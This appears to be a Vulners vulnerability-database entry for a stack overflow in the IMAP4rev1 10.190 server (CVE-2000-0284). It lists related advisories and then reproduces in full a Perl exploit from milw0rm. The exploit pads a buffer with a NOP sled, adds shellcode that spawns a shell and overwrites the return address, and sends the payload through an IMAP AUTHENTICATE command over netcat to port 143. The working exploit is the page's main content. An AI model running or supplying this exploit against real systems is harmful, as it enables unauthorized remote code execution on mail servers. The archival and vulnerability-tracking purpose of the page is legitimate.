IMAP4rev1 10.190 - Authentication Stack Overflow
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| UoW imapd (UW-IMAP) v12 Multiple Command Remote Overflows | 20 Aug 200400:00 | – | nessus | |
| UoW imapd (UW-IMAP) v12.264 or v10.24 Multiple Command Remote Overflows. | 20 Aug 200400:00 | – | nessus | |
| UoW imapd (UW-IMAP) Multiple Command Remote Overflows | 1 Mar 200100:00 | – | nessus | |
| UoW imapd (UW-IMAP) Multiple Command Remote Overflows (2) | 18 Apr 200000:00 | – | nessus | |
| CVE-2000-0284 | 26 Mar 201000:00 | – | circl | |
| CVE-2000-0284 | 26 Apr 200004:00 | – | cve | |
| CVE-2000-0284 | 26 Apr 200004:00 | – | cvelist | |
| University of Washington - imap LSUB Buffer Overflow (Metasploit) | 16 Apr 200000:00 | – | exploitdb | |
| UoW IMAPd Server - LSUB Buffer Overflow (Metasploit) | 26 Mar 201000:00 | – | exploitdb | |
| UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow | 1 Aug 200200:00 | – | exploitdb |
10
#!/usr/bin/perl
## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: [email protected] / anno 2000
##
## This is nothing new - just wrote it for fun.
$shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80".
"\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89".
"\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c".
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80".
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff".
"\x2f\x32\x39\x3e\x2f\x43\x38";
$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.
if (@ARGV < 2) {
print("Usage: $0 <target> <offset>\n");
exit(1);
}
($target, $offset) = @ARGV;
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
$exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012";
system("(echo -e \"$exploit_string\" ; cat) | nc $target 143");
# milw0rm.com [2001-01-19]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jan 2001 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.69476